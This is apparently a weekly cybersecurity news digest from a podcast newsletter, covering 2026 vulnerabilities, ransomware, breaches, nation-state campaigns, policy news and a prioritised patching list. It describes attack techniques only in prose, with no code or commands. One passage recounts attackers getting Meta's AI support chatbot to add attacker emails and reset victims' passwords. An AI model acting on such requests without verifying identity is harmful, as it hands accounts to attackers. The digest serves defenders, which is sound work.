Good Morning, Security Gang!

Double espresso ready. This week’s briefing covers four full episodes and represents some of the most operationally significant coverage we’ve produced in months.

By the end of four episodes, that framing was validated at every level. A Palo Alto GlobalProtect VPN vulnerability went from disclosure to CISA KEV with a June 1 federal deadline. A FlowWise AI platform zero-day received public exploit code enabling root access through a single malicious import. The HTTP/2 Bomb vulnerability discovered autonomously by OpenAI’s Codex could crash major web servers globally in under a minute. A VS Code zero-day with no patch available steals GitHub OAuth tokens through a one-click Jupyter notebook attack. Anthropic’s Mythos expanded to 150 more organizations across 15 countries including NATO and critical infrastructure operators. And Gamaredon deployed a USB-propagating worm with a Telegram-controlled C2 and built-in wiper module against Ukraine.

On the human side: Six million Carnival cruise customers exposed after one successful voice phishing call. A Google security engineer was charged with using confidential search data to place $1 million in prediction market bets. China’s intelligence services are systematically recruiting government insiders through LinkedIn at scale documented in a Five Eyes joint advisory. And attackers spent five months quietly extracting a stock exchange executive’s entire Outlook mailbox in small batches, using Microsoft-owned IP addresses to bypass DNS monitoring.

The week closed with a reminder James keeps returning to: “Forget all the shiny tools. If we can’t do the fundamentals well, none of those tools are going to help. That’s the reality.”

Let’s get into all of it.

🌐 Infrastructure & Network Exploitation

Palo Alto GlobalProtect VPN CVE-2026-3401: CISA KEV, June 1 Federal Deadline

Active exploitation of CVE-2026-3401 in Palo Alto Networks’ GlobalProtect VPN platform targeting local administrator accounts was confirmed by CISA, which added the flaw to the KEV catalog with a June 1 federal remediation deadline. The vulnerability continues the 2026 pattern of edge devices VPNs, firewalls, and remote access appliances serving as primary entry points for ransomware operators and nation-state actors. If immediate patching is not possible, Palo Alto recommends separating the GlobalProtect authentication cookie certificate from the HTTP service certificate to disrupt the attack path. Internet-facing security infrastructure is now one of the highest-priority attack surfaces in enterprise environments.

HTTP/2 Bomb CVE-2026-49975: One Client Can Crash a Server in Twenty Seconds

Researchers disclosed the “HTTP/2 Bomb”, a remote denial-of-service vulnerability affecting Apache HTTP Server, Microsoft IIS, Envoy Proxy, and Cloudflare’s Pingora. The attack combines HPACK compression abuse to force servers into allocating massive memory while processing small malicious traffic, with Slowloris-style techniques to prevent memory release. A single client on a residential connection can consume and hold approximately 32 gigabytes of memory on vulnerable Apache and Envoy servers in roughly twenty seconds. Researchers estimate more than 880,000 public websites are potentially affected by default configurations. Nginx patched earlier this year; Apache released fixes in late May; Microsoft IIS, Envoy, and Cloudflare’s Pingora remained unpatched at publication. The vulnerability was discovered using OpenAI’s Codex platform the second AI-assisted vulnerability disclosure this week. Patch Apache and Nginx immediately, implement strict connection limits, enforce HPACK restrictions, and review mitigation options at load balancer and WAF layers.

ClickFix Campaign: Harvard, Oxford, 700+ Trusted Websites as Malware Delivery Infrastructure

The ClickFix campaign continues expanding, actively exploiting Ghost CMS vulnerabilities to compromise over 700 websites including Harvard University, Oxford University, Auburn University, and DuckDuckGo-powered properties. Injected JavaScript presents visitors with fake CAPTCHA or browser verification prompts instructing them to press Windows+R and execute commands that launch PowerShell payloads. This bypasses traditional security awareness training entirely users trust browser prompts on legitimate, well-known domains in ways they no longer trust email attachments. Patch Ghost CMS to version 6.20.0 immediately and train users that no legitimate website will ever ask them to paste commands into a terminal.

Oracle WebLogic Added to CISA KEV: Cobalt Strike and Ransomware Payload Deployment

CISA added CVE-2024-21182, a critical Oracle WebLogic RCE vulnerability to the KEV catalog after confirming attackers are using it to deploy Cobalt Strike and ransomware. Patch immediately and review exposed WebLogic services.

ASUS Router Vulnerabilities: No Patch Until End of June

Two critical vulnerabilities in ASUS Wave 7 mesh routers expose credentials and allow persistent backdoor installation. Patches are not expected until late June. Organizations should restrict management interfaces to trusted IP ranges and implement compensating controls in the interim.

WordPress Kirki Plugin CVE-2026-8206 CVSS 9.8: One Million Sites, No Credentials Required

A critical authentication bypass in the Kirki WordPress page builder plugin allows attackers to substitute their own email during password reset, generating legitimate reset links sent directly to the attacker no credentials required, no user interaction, one request. Over one million WordPress installations are affected. Once access is gained, attackers install malicious plugins, create rogue admin accounts, inject SEO spam, and deploy backdoors. Update to version 6.0.7 or disable the plugin entirely.

🤖 AI as Discovery Engine, Target, and Threat Multiplier

Anthropic Mythos Expands to 150 Organizations Across 15 Countries Including NATO

Anthropic announced Project Glasswing expansion adding 150 organizations across 15 countries to the Mythos vulnerability discovery platform including NATO, ENISA, Samsung, healthcare providers, utilities, communications providers, and critical infrastructure operators. Mythos has already identified 23,000-plus potential vulnerabilities, 10,000-plus high and critical issues, and thousands of previously unknown flaws. The announcement coincided directly with the Trump AI executive order signed the same day. Mythos is functioning as an autonomous vulnerability discovery platform operating at a scale no human team can match. The future of cybersecurity increasingly depends on whether organizations gain access to tools like Mythos or become targets discovered by them.

Trump Signs AI Security Vetting Executive Order: Voluntary Review Framework

President Trump signed an executive order establishing a voluntary federal review framework for advanced AI models, assessing national security risks before public release. The order stepped back from an earlier proposal requiring mandatory 90-day reviews, replacing it with a 30-day voluntary government evaluation process. The framework introduces AI cybersecurity capability benchmarking, national security risk evaluations, an AI cybersecurity clearinghouse, and government-industry collaboration mechanisms. The voluntary structure creates incentives for collaboration rather than compliance-driven resistance the practical question is whether government oversight can evolve quickly enough to remain relevant.

FloWise AI Platform CVE-2026-40933: Public Exploit, Root Access via Single Import

Public working exploit code was released for a critical RCE vulnerability in FloWise, the popular open-source AI orchestration platform used to build LLM workflows and AI agents. One malicious chat flow import triggers OS-level code execution with the privileges assigned to the FlowWise process often root. FloWise deployments are commonly connected to databases, cloud services, API keys, internal applications, and AI development environments. Compromising FloWise means compromising everything connected to it. Patch immediately, restrict import permissions, review administrative access, and rotate all connected credentials.

OpenAI Codex Token Theft via npm Package: 26,000 Weekly Downloads

A malicious npm package called codex-ui-android silently exfiltrated OpenAI Codex OAuth tokens including long-lived refresh tokens before detection. Accumulated 26,000 weekly downloads. Revoke and reissue all Codex credentials immediately for any organization that may have had the package installed.

Russian GreyVibe Uses AI Across Entire Kill Chain

Researchers documented GreyVibe, a previously unknown Russian-linked threat group targeting Ukrainian organizations since August 2025, using generative AI throughout nearly every operational stage: Ideogram for phishing imagery, ChatGPT for lure development and malware support, Google Gemini for obfuscation and backend infrastructure. Attack chains include fake CAPTCHA pages, spear phishing, fraudulent charity websites, and TrickBot ecosystem malware families. This is one of the clearest documented cases of a threat actor integrating generative AI into operational workflows rather than experimentally. Defenders should expect phishing campaigns and social engineering to become increasingly personalized, scalable, and indistinguishable from legitimate communications.

AI Discovers Redis Zero-Day CVE-2026-23479 Missed for Two Years

An autonomous security tool identified a use-after-free vulnerability in Redis that had existed unnoticed since 2023. Public exploit code is now available. Redis Cloud patched; self-hosted deployments require immediate upgrade.

Chinese TA-4922 Uses LLM-Assisted Malware Development

Proofpoint reported that TA-4922, a Chinese cybercrime group targeting Europe, appears to be using LLM-assisted techniques to accelerate malware creation and campaign generation. AI-assisted offensive development is no longer exclusive to well-resourced nation-state programs.

GitLab Emergency Patch: Duo AI Identity Confusion Enables Privilege Escalation

GitLab released emergency updates for a flaw allowing an authenticated user to trigger AI-assisted workflows under another user’s identity enabling privilege escalation and lateral movement within development environments. GitLab.com patched; self-managed instances must upgrade immediately.

🧬 Supply Chain & Developer Ecosystem

VS Code Zero-Day: GitHub OAuth Token Theft via One-Click Jupyter Notebook — No Patch

Security researcher Amar Askar publicly disclosed a VS Code zero-day with no patch available that steals GitHub OAuth tokens through a single malicious Jupyter notebook. By delivering a notebook file, attackers execute JavaScript inside a WebView iframe, which silently installs a malicious extension via synthetic keyboard shortcuts and exploits GitHub’s automatic authentication between GitHub.com and GitHub.dev. The extension intercepts and exfiltrates OAuth tokens before they reach GitHub. These tokens provide access to every private repository the victim can access. No patch is available. Review installed VS Code extensions, restrict use of untrusted Jupyter notebooks, and disable notebook functionality on systems where it is not required.

Red Hat npm Supply Chain Attack “Miasma”: 32 Packages, 117,000 Weekly Downloads

The “Miasma” campaign compromised 32 official Red Hat npm packages with over 117,000 combined weekly downloads, originating after a Red Hat employee’s GitHub account was compromised. Attackers injected malicious code into repositories and leveraged GitHub Actions OIDC workflows to distribute malware through trusted package pipelines, harvesting AWS, Azure, and GCP credentials, GitHub tokens, SSH keys, and npm authentication tokens. The malware represents an evolution of the Mini Shai-Hulud campaign. Rotate all cloud and development credentials from affected packages immediately and review build pipelines for signs of compromise.

Microsoft Dispute With Nightmare Eclipse Researcher — Then Reversed

Microsoft formally stated that publishing working exploit code without coordinated disclosure is “never justifiable” and signaled potential Digital Crimes Unit action against Nightmare Eclipse, who disclosed six Windows zero-days, three already in CISA KEV, three unpatched with public PoC available. Within 24 hours, Microsoft reversed course and clarified it has no plans to pursue legal action against independent security researchers, following significant community backlash. The episode highlights the enduring tension between bug bounty program fairness, researcher incentives, and responsible disclosure.

Container and Kubernetes Attacks Growing: Exposed Docker APIs and Weak RBAC

Researchers warned about active exploitation of container and Kubernetes misconfigurations exposed Docker APIs, weak RBAC permissions, and poisoned container images with campaigns specifically targeting cloud-native infrastructure and Kubernetes secrets.

Dashlane Detects Brute Force Campaign Against Customer Accounts

Dashlane confirmed detection and mitigation of a brute-force campaign attempting to register unauthorized devices. Some encrypted vaults were copied; no master passwords exposed. Customers should review registered devices and account activity.

💥 Ransomware & Destructive Operations

NightSpire Ransomware: 175 Organizations Across 28 Industries

NightSpire continues expanding with 175 organizations impacted across 28 industries including hospitals, schools, financial institutions, and government agencies. The group operates exclusively through legitimate tools: exposed RDP and FortiOS vulnerabilities for entry; Chrome Remote Desktop, AnyDesk for persistence; MegaSync for exfiltration; 7-Zip for compression. No custom malware, no EDR triggers. Audit exposed RDP access, FortiOS patching status, and unauthorized remote administration software across all environments.

🔓 Data Breaches & Identity Exposures

Carnival Cruise Lines: Six Million Victims, One Phone Call

Carnival Cruise Lines confirmed nearly six million individuals affected by an April breach originating from a single social engineering attack against an employee account. ShinyHunters claimed responsibility. Exposed data includes names, email addresses, phone numbers, dates of birth, driver’s license numbers, and passport information. Credit monitoring does not protect against identity fraud involving passport data. Frontline employees remain one of the most critical attack surfaces in any organization.

Charter Communications: 42 Million Records via Voice Phishing

Charter Communications confirmed approximately 42 million customer records exposed following a voice phishing attack against a Microsoft Entra account, which became the Salesforce pivot point. The ShinyHunters SaaS playbook, vishing targets identity provider, becomes Salesforce access, becomes large-scale data extraction has now been executed against Charter, Carnival, 7-Eleven, Cushman & Wakefield, Aman Resorts, and dozens of others in 2026 alone.

UK Visa Portal: 100,000 Biometric Identity Documents Leaked

A third-party UK visa processing portal leaked more than 100,000 passport scans and biometric selfies. When journalists reported the exposure, the company responded with lawyers before engineers. At time of reporting, the leak remained unresolved. Passport scans combined with biometric selfies enable KYC bypasses, fake identity creation, and fraudulent financial account openings. This perfectly captures the industry’s most persistent operational failure: organizations still treating cybersecurity incidents as communications crises rather than technical emergencies.

Meta AI Support Bot Enabled Instagram Account Takeover

Meta’s AI support chatbot was exploited by attackers who discovered it could be used to request account recovery actions on behalf of victims adding an attacker-controlled email address, triggering legitimate password resets, and gaining full account control without the owner’s involvement. Victims included high-profile government, military, and cybersecurity community accounts. Meta fixed the issue, but the incident establishes a new category: AI systems granted administrative authority without sufficient identity verification become privileged attack surfaces. This is not the last AI trust-boundary failure we will see.

Five-Month Espionage Campaign Extracts Stock Exchange Executive’s Outlook Mailbox

Symantec documented a five-month operation quietly extracting a senior executive’s Outlook mailbox in carefully staged increments. Attackers used malware disguised as Adobe and OneDrive services, exfiltrated through Dropbox and personal OneDrive accounts, and used hardcoded Microsoft-owned IP addresses to bypass DNS monitoring. Small date-based data batches avoided triggering large-transfer alerts. Market-moving information, regulatory discussions, merger activity, and strategic correspondence represent intelligence value far exceeding the cost of a disruptive attack. The most dangerous adversaries aren’t making noise they’re remaining invisible.

🌐 Geopolitical & Nation-State Threats

Gamaredon Deploys USB Worm with Telegram C2 and Wiper Module Against Ukraine

Russia’s FSB-linked Gamaredon exploited WinRAR CVE-2025-8088 to deploy a multi-stage infection chain including GammaLoad (downloader), GammaWorm (USB-propagating worm hiding via NTFS alternate data streams), GammaSteal (exfiltration to AWS S3 using Telegram channels for C2), and GammaWipe (destructive wiper module). Telegram-based C2 blends malicious communications into legitimate enterprise traffic. Gamaredon is distinct from many threat groups for sustained operational patience campaigns remain active for months, continuously adapting. Organizations with Ukrainian partners or shared infrastructure should patch WinRAR immediately and monitor for suspicious Telegram outbound traffic and unexpected S3 uploads.

Five Eyes Joint Advisory: China Systematically Recruiting Government Insiders via LinkedIn

A joint advisory from U.S., Canadian, UK, Australian, and New Zealand intelligence agencies documented Chinese intelligence services systematically recruiting government employees, military personnel, contractors, and critical infrastructure workers through LinkedIn, Indeed, and Upwork. The recruitment funnel: initial contact through professional platforms → access and value evaluation → harmless research requests → gradually sensitive tasking. Compensation through PayPal, Payoneer, cryptocurrency, and wire transfers. Once trust is established, communications migrate to Signal and Telegram, moving activity outside organizational visibility. Classified access is not required to be a target facility layouts, contract details, budget information, and vendor relationships have significant intelligence value when aggregated. Use this advisory to review insider threat awareness programs and LinkedIn exposure policies immediately.

Mustang Panda Returns with New PlugX Delivery via Fake Adobe Prompts

Chinese APT Mustang Panda resurfaced using fake Adobe Acrobat update prompts to deliver PlugX malware, leveraging signed binaries and memory-only execution techniques to reduce detection. Hunt for Mustang Panda PlugX indicators across endpoints.

Iranian APT Expands Across Nine Countries, Adds Aviation Supply Chain Targeting

MuddyWater campaigns across nine countries in Q1 2026 refined DLL side-loading tradecraft through trusted executables including fmap.exe and SentinelOne Memory Scanner components. A separate Iranian cluster simultaneously targeted aviation software providers through credential harvesting pre-positioning for downstream pivot into airlines, airports, and aerospace organizations.

🔐 Identity, Authentication & Insider Threats

Kali365 MFA Bypass: FBI IC3 Warning, OAuth Device Code Abuse at Scale

The FBI warned about Kali365, a phishing-as-a-service platform bypassing Microsoft 365 MFA through OAuth device code flow abuse the authentication flow designed for smart TVs and printers. Victims authenticate normally. MFA fires successfully. Attackers capture live tokens and gain full account access. The platform includes AI-generated phishing lures, real-time victim dashboards, and Telegram-based infrastructure. Hundreds of attacks across manufacturing, healthcare, education, government, and financial sectors. Restrict or disable device code authentication flows through Microsoft Entra conditional access policies where operationally feasible.

Windows Netlogon CVE-2026-21176: “The New Zerologon” — Pre-Auth, Zero-Click, Domain Controller RCE

A critical Netlogon vulnerability affecting Windows Domain Controllers requiring only a single specially crafted network packet to achieve system-level code execution, no credentials, no user interaction was compared by researchers to Zerologon in operational severity. Microsoft patched during May’s Patch Tuesday. Organizations that have not yet updated Domain Controllers remain vulnerable. Domain Controllers are the crown jewels of Windows environments compromise here enables full forest takeover. Verify patch deployment, confirm Netlogon protections, and ensure SMB and RPC are not externally exposed.

Linux Kernel Privilege Escalation: 19-Year Flaw Now Has Public Exploit

A proof-of-concept exploit is publicly available for the recently disclosed 19-year-old Linux kernel privilege escalation vulnerability. Organizations that delayed patching now face significantly elevated risk. Patch Linux systems immediately across all distributions.

Android Zero-Day CVE-2025-48595: June Security Update

Google’s June Android security update addressed 124 vulnerabilities including CVE-2025-48595, a privilege escalation flaw confirmed under limited active exploitation. Accelerate patch deployment through MDM platforms across all managed Android devices.

Google Security Engineer Charged: Prediction Market Insider Trading via Search Data

Federal prosecutors charged a Google security engineer with fraud and money laundering for allegedly using confidential internal search trend data to place highly profitable prediction market bets on Polymarket, generating over $1 million in cryptocurrency profits. This is not a traditional cyberattack but it highlights an expanding insider threat vector. Insider access can increasingly be monetized through financial instruments, prediction markets, and cryptocurrency ecosystems. Insider risk monitoring programs may need to expand to address these evolving scenarios.

Federal ATG Fuel Monitoring Systems Under Active Attack: Seven Agency Warning

CISA, FBI, NSA, DOE, TSA, EPA, and other agencies jointly warned about active attacks targeting Automatic Tank Gauge systems used at fuel stations, transportation hubs, and chemical facilities exploiting internet-exposed systems protected only by default passwords. Remove ATG systems from direct internet exposure immediately.

⚖️ Law Enforcement, Policy & Industry

Netherlands Dismantles ASOC Residential Proxy Botnet: 17 Million Devices

Dutch law enforcement dismantled the ASOC residential proxy botnet tied to more than one million infected devices and leveraging over 17 million compromised endpoints globally. Access was sold for five dollars per month for credential stuffing, DDoS, phishing, and proxy services. Residential proxy networks remain valuable because consumer IP traffic appears legitimate to most security controls.

NSA Appoints David Imbordino as Cyber Director, Bruce Jones to CCC

The NSA formally appointed David Imbordino as Cyber Director and Bruce Jones to lead the Cybersecurity Collaboration Center, ending a prolonged leadership gap and restoring continuity for government-private sector cybersecurity partnerships.

Spain Arrests Government Data Hacker

Spanish authorities arrested an individual accused of publishing sensitive information belonging to national police, intelligence personnel, and Spain’s cybersecurity agency. Cybersecurity professionals increasingly face physical-world targeting through doxxing campaigns.

Proposal for Independent U.S. Cyber Force: 30,000 Personnel, $11 Billion

A new policy report recommends creation of a dedicated U.S. Cyber Force. Supporters argue cyber operations have grown large enough to justify their own military branch.

CISA Remains Significantly Understaffed

Homeland Security leadership confirmed CISA is operating with approximately 2,200 employees despite authorization for substantially more. Efforts to rebuild the agency continue during a period of elevated threat activity.

Dragos Acquires Phosphorus: OT and IoT Security Convergence

Dragos announced acquisition of Phosphorus, expanding its ability to secure IoT devices within OT environments reflecting the continued convergence of traditional OT security and connected device management.

Cyera Raises at $12 Billion Valuation

AI security company Cyera is reportedly raising $300 million at a $12 billion valuation on approximately $150 million ARR, reflecting the extraordinary premium investors continue placing on AI security and automation platforms.

✅ This Week’s Priority Action List

Immediate (Do This Now)

• Patch Palo Alto GlobalProtect immediately — CISA KEV, June 1 federal deadline, active exploitation confirmed

• Patch Apache HTTP Server and Nginx for HTTP/2 Bomb vulnerability — 880,000 potentially affected sites, active exploitation risk

• Patch Oracle WebLogic CVE-2024-21182 — CISA KEV, Cobalt Strike and ransomware payloads confirmed

• Verify Windows Domain Controller patch deployment for Netlogon CVE-2026-21176 — pre-auth zero-click RCE, “the new Zerologon”

• Patch GitLab self-managed instances for Duo AI identity confusion vulnerability immediately

• Update or disable WordPress Kirki plugin — CVSS 9.8, one million sites, no credentials required for account takeover

• Patch FlowWise immediately and restrict import permissions — public exploit enables root access via single malicious import

• Revoke and reissue OpenAI Codex credentials if codex-ui-android npm package was present

• Patch WinRAR for CVE-2025-8088 — Gamaredon is actively exploiting this for USB worm and wiper deployment

• Restrict or disable Microsoft Entra device code authentication flows — Kali365 FBI IC3 warning, active MFA bypass at scale

• Patch Linux systems for 19-year privilege escalation vulnerability — public exploit now available

• Deploy June Android security updates through MDM for CVE-2025-48595 active exploitation

Short-Term (This Month)

• Audit VS Code extensions and restrict untrusted Jupyter notebook execution — GitHub OAuth token theft zero-day has no patch

• Rotate cloud and development credentials associated with Red Hat npm Miasma campaign

• Hunt for Mustang Panda PlugX indicators across endpoints

• Hunt for suspicious Dropbox and OneDrive exfiltration activity in small date-batched increments — five-month stock exchange espionage model

• Monitor for Telegram-based outbound C2 traffic and unexpected AWS S3 uploads from endpoints — Gamaredon GammaSteal indicators

• Remove ATG fuel monitoring systems from any direct internet exposure

• Brief employees on LinkedIn-based intelligence recruitment following Five Eyes joint advisory

• Enforce voice phishing verification procedures — Carnival and Charter both started with one phone call

• Implement connection limits and HPACK protections on all internet-facing web servers

• Review GitHub Actions OIDC trust policies and restrict secrets access from external fork triggers

• Patch Redis if self-hosted — CVE-2026-23479 use-after-free, public exploit available

• Restrict ASUS router management interfaces to trusted IP ranges until end-of-June patches arrive

Strategic (This Quarter)

• Evaluate AI-assisted vulnerability management — Mythos, AI-discovered Redis zero-day, and HTTP/2 Bomb discovery all demonstrate autonomous discovery at operational scale

• Expand insider threat monitoring to include financial market abuse, prediction markets, and cryptocurrency monetization scenarios

• Accelerate migration to FIDO2 and passkeys — OAuth device code MFA bypass and real-time OTP interception are at industrial scale

• Compress vulnerability remediation SLAs for internet-facing systems to match actual exploitation timelines

• Review organizational LinkedIn exposure policies and communicate Five Eyes insider recruitment advisory to all staff with sensitive access

• Require CVE assignment and public changelog disclosure from all AI vendors with privileged developer environment access

• Establish physical social engineering tabletop exercises incorporating front desk, USB device, and visitor management scenarios

🎙️ James Azar’s CISO’s Take

When I look across this week’s four episodes, the defining theme is operational speed and the widening gap between how fast attackers are moving and how fast most organizations are structured to respond. Palo Alto GlobalProtect went from disclosure to CISA KEV with a federal deadline of June 1. FlowWise received public root exploit code the same day. The HTTP/2 Bomb can crash major web servers in twenty seconds. The Netlogon vulnerability requires one network packet and no credentials. Against that backdrop, organizations still operating on 30-day patch cycles for internet-facing critical infrastructure are not just behind they are accepting risk they have not explicitly acknowledged. The fundamentals are the battle. Not dashboards, not AI tools, not frameworks. Patch fast. Detect faster. Train your people. That’s it.

The second major takeaway is that AI has become a fully operational force multiplier on both sides simultaneously. Mythos is autonomously discovering vulnerabilities at a scale no human team can match and is now deployed across NATO, critical infrastructure, and major technology organizations. GreyVibe is using ChatGPT and Gemini throughout its kill chain as operational infrastructure, not experiments. OpenAI’s Codex discovered the HTTP/2 Bomb autonomously. And attackers are selling AI-generated phishing campaigns as subscription services. Security leaders who are still treating AI as a future challenge rather than a present operational reality are working with an incomplete picture of the battlefield they are operating on today.

Stay Cyber Safe. 🔐

📋 Week in Summary

This was the week speed proved itself the defining variable in cybersecurity not sophistication, not resources, not tooling. The HTTP/2 Bomb crashes servers in twenty seconds. A single Jupyter notebook steals GitHub OAuth tokens before a user closes the window. Gamaredon deployed a USB worm, infostealer, and wiper capability through one WinRAR vulnerability in one coordinated operation. And Carnival’s six million victims trace back to a single voice phishing call against a single employee. The velocity of modern attacks does not leave time for 30-day governance workflows, approval chains, or scheduled patch cycles. The organizations matching attacker speed will survive. The ones that don’t will keep providing the case studies.

The intelligence and human-layer stories this week were equally significant. A Five Eyes joint advisory documented China’s systematic LinkedIn recruitment of government insiders at scale using professional networking platforms as intelligence collection infrastructure. A five-month espionage campaign extracted an executive’s entire strategic communications in small batches designed to be invisible to monitoring systems. A Google security engineer allegedly used privileged access to prediction markets rather than exfiltrating data. These are not technical problems with technical solutions. They are operational, human, and institutional challenges that require awareness programs, monitoring expansion, and cultural change in addition to security tooling. The battlefield has always been both technical and human. This week made that undeniably clear.

Stay informed. Stay prepared. Stay Cyber Safe. 🔐

© CyberHub Podcast | Subscribe on Substack | Watch on YouTube | Follow on LinkedIn